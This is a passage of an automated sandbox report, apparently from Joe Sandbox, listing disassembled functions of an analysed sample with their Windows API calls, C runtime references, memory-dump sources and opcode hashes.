                                                                      • Source File: 00000015.00000002.1049648852.000000006F0A1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6F0A0000, based on PE: true
                                                                      • Associated: 00000015.00000002.1049641205.000000006F0A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049749552.000000006F124000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049772507.000000006F13E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049780627.000000006F140000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049788039.000000006F141000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049794126.000000006F143000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049818570.000000006F14E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_6f0a0000_6E11.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLastXinvalid_argumentstd::_
                                                                      • String ID: operation failed with error $OS_Rng:
                                                                      • API String ID: 406877150-700108173
                                                                      • Opcode ID: 28c64ce993b7ab778482bb4a36a958239264cf78573843a6e159f25e90d36bc5
                                                                      • Instruction ID: 7a1dde9f97244d52460c082de94c4ecfd7c7ed4efe631fc20403fe06265c5253
                                                                      • Opcode Fuzzy Hash: 28c64ce993b7ab778482bb4a36a958239264cf78573843a6e159f25e90d36bc5
                                                                      • Instruction Fuzzy Hash: 22419FB1508380DFD320DF69C841B5BFBE8BB99694F50491EE48987381EB75A404CB53
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 6F0FDEE0 Relevance: 1.6, APIs: 1, Instructions: 71encryptionCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 6F0A4760: __CxxThrowException@8.LIBCMT ref: 6F0A47F9
                                                                      • CryptReleaseContext.ADVAPI32(?,00000000,00000000,?), ref: 6F0FDF7B
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.1049648852.000000006F0A1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6F0A0000, based on PE: true
                                                                      • Associated: 00000015.00000002.1049641205.000000006F0A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049749552.000000006F124000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049772507.000000006F13E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049780627.000000006F140000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049788039.000000006F141000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049794126.000000006F143000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049818570.000000006F14E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_6f0a0000_6E11.jbxd
                                                                      Similarity
                                                                      • API ID: ContextCryptException@8ReleaseThrow
                                                                      • String ID:
                                                                      • API String ID: 3140249258-0
                                                                      • Opcode ID: f41b3b3f9c470a705f80fd13b877777af97dffeacffe6c923ff4bfad3696cab6
                                                                      • Instruction ID: 4d2973d92f3cd3c3943bdb3bd01b696d3924740adb93319f3ca67e310a5738af
                                                                      • Opcode Fuzzy Hash: f41b3b3f9c470a705f80fd13b877777af97dffeacffe6c923ff4bfad3696cab6
                                                                      • Instruction Fuzzy Hash: C4217FB5509344ABC300DF14D940B5BBBE9EF9A768F440A1DF84593381D771A509CBA2
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 6F0FDD20 Relevance: 1.6, APIs: 1, Instructions: 66encryptionCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CryptReleaseContext.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,00000000,6F11F0E6,000000FF,6F0FDF67,00000000,?), ref: 6F0FDDB4
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.1049648852.000000006F0A1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6F0A0000, based on PE: true
                                                                      • Associated: 00000015.00000002.1049641205.000000006F0A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049749552.000000006F124000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049772507.000000006F13E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049780627.000000006F140000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049788039.000000006F141000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049794126.000000006F143000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049818570.000000006F14E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_6f0a0000_6E11.jbxd
                                                                      Similarity
                                                                      • API ID: ContextCryptRelease
                                                                      • String ID:
                                                                      • API String ID: 829835001-0
                                                                      • Opcode ID: d52afd8d4e34e72eba2cba3506c199a938b7e95dcfe6321d5f3e536f989f53f4
                                                                      • Instruction ID: 2c0af1d2784796fec978e28ae77a5cd822e1919bbbe4423b5c3f265be4454b43
                                                                      • Opcode Fuzzy Hash: d52afd8d4e34e72eba2cba3506c199a938b7e95dcfe6321d5f3e536f989f53f4
                                                                      • Instruction Fuzzy Hash: 7C11E6B160AB519BEB10DF58C881B5A73E9FB456A4F440A3EED15C3380FB79E4188B91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 015653D4 Relevance: .1, Instructions: 123COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.1048355079.0000000001560000.00000040.00000800.00020000.00000000.sdmp, Offset: 01560000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_1560000_6E11.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 06f1db69e6be3b4c6d7c3d0a3d8993074d8b64437478d1b9c0293a18f04ed54f
                                                                      • Instruction ID: 13d8cc15c218fbca8906f94e0339998659270bba5f5f95827951ebf976dafd25
                                                                      • Opcode Fuzzy Hash: 06f1db69e6be3b4c6d7c3d0a3d8993074d8b64437478d1b9c0293a18f04ed54f
                                                                      • Instruction Fuzzy Hash: 8B41E0B0E002489FDB14CFA9D984BADBBF5FB59300F209129E415FB251D7749885CF85
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0156B4CD Relevance: .1, Instructions: 121COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.1048355079.0000000001560000.00000040.00000800.00020000.00000000.sdmp, Offset: 01560000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_1560000_6E11.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 3e85c17c569ef925c3c2ac55fafa2c2bd5f3eee983765ba8160e910b5d99099a
                                                                      • Instruction ID: f9e988a753c3f700eb9ec96596bf34d78193bba2f5787ef1b084d65d5cc457d6
                                                                      • Opcode Fuzzy Hash: 3e85c17c569ef925c3c2ac55fafa2c2bd5f3eee983765ba8160e910b5d99099a
                                                                      • Instruction Fuzzy Hash: 5041FEB4E002489FDB24CFA9D984B9DBBF5BB59300F249029E428BB391D7749885CF85
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0156CBD9 Relevance: .1, Instructions: 89COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.1048355079.0000000001560000.00000040.00000800.00020000.00000000.sdmp, Offset: 01560000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_1560000_6E11.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 139ba8feebd590c6bb3a1662f75c711dd3e38527ffc8be8b525c32b64d644176
                                                                      • Instruction ID: 7732da8d2f42ab0da92b719158b326b9e4322c5dc0ffff509fb140c751d58aa3
                                                                      • Opcode Fuzzy Hash: 139ba8feebd590c6bb3a1662f75c711dd3e38527ffc8be8b525c32b64d644176
                                                                      • Instruction Fuzzy Hash: 6431B275D01208AFDB05DFA8D850AEEFBB5EF49310F10906AE915B7360DB70AA05CB95
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0156CAC8 Relevance: .1, Instructions: 89COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.1048355079.0000000001560000.00000040.00000800.00020000.00000000.sdmp, Offset: 01560000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_1560000_6E11.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 0ff4a1ac5e5e04d3004d6cb8ce0317cb55a51ce5131f3db931b83bcb1b65f73e
                                                                      • Instruction ID: 2f3ce55e09b11ca4fe6b8f20d03efa74715053aaf62675c16edb959598f18774
                                                                      • Opcode Fuzzy Hash: 0ff4a1ac5e5e04d3004d6cb8ce0317cb55a51ce5131f3db931b83bcb1b65f73e
                                                                      • Instruction Fuzzy Hash: 48319075D01208AFDB04DFA8D850AEEBBB5AF49310F10906AE915B7360DB309A05CBA5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0156C9C0 Relevance: .1, Instructions: 87COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.1048355079.0000000001560000.00000040.00000800.00020000.00000000.sdmp, Offset: 01560000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_1560000_6E11.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 24bc1827f760b34aac5fbcd00bfa242e2c5cb994ee2e4a028152617e299a7a65
                                                                      • Instruction ID: 6f2b049429de710b328b7d55e97b86444ff369cc6b7293b3dddeb2c99ef37b81
                                                                      • Opcode Fuzzy Hash: 24bc1827f760b34aac5fbcd00bfa242e2c5cb994ee2e4a028152617e299a7a65
                                                                      • Instruction Fuzzy Hash: 9F31B375D11208AFDB04CFA8D850AEEFBB5FF49310F10906AE915B7360DB309A04CBA5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0156CBE0 Relevance: .1, Instructions: 87COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.1048355079.0000000001560000.00000040.00000800.00020000.00000000.sdmp, Offset: 01560000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_1560000_6E11.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 1b4646c58d8aab31ce2ea489d1a82cac1245917895b0c7e31cbfe43983a524fc
                                                                      • Instruction ID: f6a7dcb86288a5b62f56d4647a619896bef310eb613f109bf1bd128df1fc192d
                                                                      • Opcode Fuzzy Hash: 1b4646c58d8aab31ce2ea489d1a82cac1245917895b0c7e31cbfe43983a524fc
                                                                      • Instruction Fuzzy Hash: CB31B275D01208AFDB04CFA8D850AEEFBB5FF49310F10906AE915B7360DB30AA05CBA5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0156CAD0 Relevance: .1, Instructions: 87COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.1048355079.0000000001560000.00000040.00000800.00020000.00000000.sdmp, Offset: 01560000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_1560000_6E11.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 041800eb7f0b1bd5a45fd30d7ca176d93fc3679c2f8c1cabcab4a7f3b545a8ad
                                                                      • Instruction ID: 55519469792cced45376606976374f9e9623c4719cf46c9e466952485c134ecd
                                                                      • Opcode Fuzzy Hash: 041800eb7f0b1bd5a45fd30d7ca176d93fc3679c2f8c1cabcab4a7f3b545a8ad
                                                                      • Instruction Fuzzy Hash: F331A075D01208AFDB04DFA8D850AEEFBB5AF49310F10906AE915B7360DB30AA04CBA5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0156C9B9 Relevance: .1, Instructions: 86COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.1048355079.0000000001560000.00000040.00000800.00020000.00000000.sdmp, Offset: 01560000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_1560000_6E11.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: a8e85dda8b77b0a4dbdbb1d9be51a7c19abc4cc39e86f7e2286a4d9bbd8c163b
                                                                      • Instruction ID: 255b400c6c9b1b09c956ad852da56d8029a0cb979c26939ba53e36312de5dfb4
                                                                      • Opcode Fuzzy Hash: a8e85dda8b77b0a4dbdbb1d9be51a7c19abc4cc39e86f7e2286a4d9bbd8c163b
                                                                      • Instruction Fuzzy Hash: 4E31B275E11208AFDB05CFA8D890AEEFBB1BF49310F10906AE915B7360DB309A44CB95
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 6F1084B0 Relevance: .1, Instructions: 53COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.1049648852.000000006F0A1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6F0A0000, based on PE: true
                                                                      • Associated: 00000015.00000002.1049641205.000000006F0A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049749552.000000006F124000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049772507.000000006F13E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049780627.000000006F140000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049788039.000000006F141000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049794126.000000006F143000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049818570.000000006F14E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_6f0a0000_6E11.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 20e04f8e007b40b8e353e9a745ed34a75f5de9d427f6619e7122476668f1c5f0
                                                                      • Instruction ID: 318e79bea2a5d942c136bf16174eafb32153405c6dd17919cda623c5e670df72
                                                                      • Opcode Fuzzy Hash: 20e04f8e007b40b8e353e9a745ed34a75f5de9d427f6619e7122476668f1c5f0
                                                                      • Instruction Fuzzy Hash: 1B113CB2908609EFC704CF59D841B9AFBF5FB45770F10822EE81993B80DB35A910CB90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 6F116FB1 Relevance: 54.3, APIs: 36, Instructions: 344COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • operator+.LIBCMT ref: 6F116FCC
                                                                        • Part of subcall function 6F114147: DName::DName.LIBCMT ref: 6F11415A
                                                                        • Part of subcall function 6F114147: DName::operator+.LIBCMT ref: 6F114161
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.1049648852.000000006F0A1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6F0A0000, based on PE: true
                                                                      • Associated: 00000015.00000002.1049641205.000000006F0A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049749552.000000006F124000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049772507.000000006F13E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049780627.000000006F140000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049788039.000000006F141000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049794126.000000006F143000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049818570.000000006F14E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_6f0a0000_6E11.jbxd
                                                                      Similarity
                                                                      • API ID: NameName::Name::operator+operator+
                                                                      • String ID:
                                                                      • API String ID: 2937105810-0
                                                                      • Opcode ID: 253042d057a53340864cfa9149087d2c576d39b50f093ec37c9dc58d19c11387
                                                                      • Instruction ID: cd4f44b118b032d8051bc7fb00cde3f3db68f4fb473d4fa6209e214bad6d9198
                                                                      • Opcode Fuzzy Hash: 253042d057a53340864cfa9149087d2c576d39b50f093ec37c9dc58d19c11387
                                                                      • Instruction Fuzzy Hash: CBD141B5908309AFDF01DFA8C885AEEBBF4AF15394F00417AE511E7390DB35AA56CB50
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 6F10EC9D Relevance: 40.4, APIs: 18, Strings: 5, Instructions: 109libraryloadermemoryCOMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,6F10A2D4,6F1395C0,00000008,6F10A468,?,?,?,6F1395E0,0000000C,6F10A523,?), ref: 6F10ECA5
                                                                      • __mtterm.LIBCMT ref: 6F10ECB1
                                                                        • Part of subcall function 6F10E97C: DecodePointer.KERNEL32(0000000F,6F10A397,6F10A37D,6F1395C0,00000008,6F10A468,?,?,?,6F1395E0,0000000C,6F10A523,?), ref: 6F10E98D
                                                                        • Part of subcall function 6F10E97C: TlsFree.KERNEL32(00000022,6F10A397,6F10A37D,6F1395C0,00000008,6F10A468,?,?,?,6F1395E0,0000000C,6F10A523,?), ref: 6F10E9A7
                                                                        • Part of subcall function 6F10E97C: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,6F10A397,6F10A37D,6F1395C0,00000008,6F10A468,?,?,?,6F1395E0,0000000C,6F10A523,?), ref: 6F112325
                                                                        • Part of subcall function 6F10E97C: DeleteCriticalSection.KERNEL32(00000022,?,?,6F10A397,6F10A37D,6F1395C0,00000008,6F10A468,?,?,?,6F1395E0,0000000C,6F10A523,?), ref: 6F11234F
                                                                      • GetProcAddress.KERNEL32(00000000,FlsAlloc,?,?,6F10A2D4,6F1395C0,00000008,6F10A468,?,?,?,6F1395E0,0000000C,6F10A523,?), ref: 6F10ECC7
                                                                      • GetProcAddress.KERNEL32(00000000,FlsGetValue,?,?,6F10A2D4,6F1395C0,00000008,6F10A468,?,?,?,6F1395E0,0000000C,6F10A523,?), ref: 6F10ECD4
                                                                      • GetProcAddress.KERNEL32(00000000,FlsSetValue,?,?,6F10A2D4,6F1395C0,00000008,6F10A468,?,?,?,6F1395E0,0000000C,6F10A523,?), ref: 6F10ECE1
                                                                      • GetProcAddress.KERNEL32(00000000,FlsFree,?,?,6F10A2D4,6F1395C0,00000008,6F10A468,?,?,?,6F1395E0,0000000C,6F10A523,?), ref: 6F10ECEE
                                                                      • TlsAlloc.KERNEL32(?,?,6F10A2D4,6F1395C0,00000008,6F10A468,?,?,?,6F1395E0,0000000C,6F10A523,?), ref: 6F10ED3E
                                                                      • TlsSetValue.KERNEL32(00000000,?,?,6F10A2D4,6F1395C0,00000008,6F10A468,?,?,?,6F1395E0,0000000C,6F10A523,?), ref: 6F10ED59
                                                                      • __init_pointers.LIBCMT ref: 6F10ED63
                                                                      • EncodePointer.KERNEL32(?,?,6F10A2D4,6F1395C0,00000008,6F10A468,?,?,?,6F1395E0,0000000C,6F10A523,?), ref: 6F10ED74
                                                                      • EncodePointer.KERNEL32(?,?,6F10A2D4,6F1395C0,00000008,6F10A468,?,?,?,6F1395E0,0000000C,6F10A523,?), ref: 6F10ED81
                                                                      • EncodePointer.KERNEL32(?,?,6F10A2D4,6F1395C0,00000008,6F10A468,?,?,?,6F1395E0,0000000C,6F10A523,?), ref: 6F10ED8E
                                                                      • EncodePointer.KERNEL32(?,?,6F10A2D4,6F1395C0,00000008,6F10A468,?,?,?,6F1395E0,0000000C,6F10A523,?), ref: 6F10ED9B
                                                                      • DecodePointer.KERNEL32(Function_0006EB00,?,?,6F10A2D4,6F1395C0,00000008,6F10A468,?,?,?,6F1395E0,0000000C,6F10A523,?), ref: 6F10EDBC
                                                                      • __calloc_crt.LIBCMT ref: 6F10EDD1
                                                                      • DecodePointer.KERNEL32(00000000,?,?,6F10A2D4,6F1395C0,00000008,6F10A468,?,?,?,6F1395E0,0000000C,6F10A523,?), ref: 6F10EDEB
                                                                      • GetCurrentThreadId.KERNEL32 ref: 6F10EDFD
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.1049648852.000000006F0A1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6F0A0000, based on PE: true
                                                                      • Associated: 00000015.00000002.1049641205.000000006F0A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049749552.000000006F124000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049772507.000000006F13E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049780627.000000006F140000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049788039.000000006F141000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049794126.000000006F143000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049818570.000000006F14E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_6f0a0000_6E11.jbxd
                                                                      Similarity
                                                                      • API ID: Pointer$AddressEncodeProc$Decode$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm
                                                                      • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                                      • API String ID: 1868149495-3819984048
                                                                      • Opcode ID: c39a4493b35319ff458d7015432ce1ace3cd00d123456e9b8cf753515bea602d
                                                                      • Instruction ID: 5b7a4ae5f9ac7693d9f4b7309e1f936b27a0b575b61835c349cf7fe54b1120b5
                                                                      • Opcode Fuzzy Hash: c39a4493b35319ff458d7015432ce1ace3cd00d123456e9b8cf753515bea602d
                                                                      • Instruction Fuzzy Hash: 4A314F31900B15ABDF11BFB69808A553FE5FBA67F0714092AE42493190DF70A1BDDF94
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 6F0B0EA0 Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 337COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.1049648852.000000006F0A1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6F0A0000, based on PE: true
                                                                      • Associated: 00000015.00000002.1049641205.000000006F0A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049749552.000000006F124000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049772507.000000006F13E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049780627.000000006F140000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049788039.000000006F141000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049794126.000000006F143000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049818570.000000006F14E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_6f0a0000_6E11.jbxd
                                                                      Similarity
                                                                      • API ID: Xinvalid_argument_memmovestd::_
                                                                      • String ID: invalid string position$string too long
                                                                      • API String ID: 256744135-4289949731
                                                                      • Opcode ID: b67abb1fc8747fb25635adc65fda83bb9ba6a27225854d94a8d2b8bf6b402543
                                                                      • Instruction ID: 813a82ed0742450e863a6cb6c04d5f5632c279ce845f377c61095e3b4d7cbf52
                                                                      • Opcode Fuzzy Hash: b67abb1fc8747fb25635adc65fda83bb9ba6a27225854d94a8d2b8bf6b402543
                                                                      • Instruction Fuzzy Hash: 87B18C71318145EBDB28CE1CDDA0B5EB3A6EB893447544A1DF892CB780C636EC91CBA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 6F0CD790 Relevance: 21.3, APIs: 14, Instructions: 283COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 6F109BB5: _malloc.LIBCMT ref: 6F109BCF
                                                                      • std::exception::exception.LIBCMT ref: 6F0CD861
                                                                      • __CxxThrowException@8.LIBCMT ref: 6F0CD878
                                                                      • VariantInit.OLEAUT32(?), ref: 6F0CD8EC
                                                                      • VariantInit.OLEAUT32 ref: 6F0CD902
                                                                      • VariantInit.OLEAUT32(?), ref: 6F0CD90D
                                                                      • SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000002), ref: 6F0CD929
                                                                      • SafeArrayPutElement.OLEAUT32(?,?,?), ref: 6F0CD966
                                                                      • VariantClear.OLEAUT32(?), ref: 6F0CD973
                                                                      • SafeArrayPutElement.OLEAUT32(?,?,?), ref: 6F0CD9B4
                                                                      • VariantClear.OLEAUT32(?), ref: 6F0CD9C1
                                                                      • SafeArrayDestroy.OLEAUT32(?), ref: 6F0CDA6F
                                                                      • VariantClear.OLEAUT32(?), ref: 6F0CDA80
                                                                      • VariantClear.OLEAUT32(?), ref: 6F0CDA87
                                                                      • VariantClear.OLEAUT32(?), ref: 6F0CDA99
                                                                        • Part of subcall function 6F0BDB30: VariantInit.OLEAUT32(6F0C31EC), ref: 6F0BDB5E
                                                                        • Part of subcall function 6F0BDB30: SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6F0BDB6E
                                                                        • Part of subcall function 6F0BDB30: SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6F0BDB82
                                                                        • Part of subcall function 6F0BDB30: SafeArrayDestroy.OLEAUT32(00000000), ref: 6F0BDBF1
                                                                        • Part of subcall function 6F0BDB30: VariantClear.OLEAUT32(?), ref: 6F0BDBFB
                                                                        • Part of subcall function 6F0C56B0: VariantInit.OLEAUT32(?), ref: 6F0C570E
                                                                        • Part of subcall function 6F0C56B0: VariantCopy.OLEAUT32(?,00000000), ref: 6F0C5716
                                                                        • Part of subcall function 6F0C6880: VariantInit.OLEAUT32(?), ref: 6F0C68B2
                                                                        • Part of subcall function 6F0C6880: VariantInit.OLEAUT32(?), ref: 6F0C68BD
                                                                        • Part of subcall function 6F0C6880: SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000002), ref: 6F0C68D7
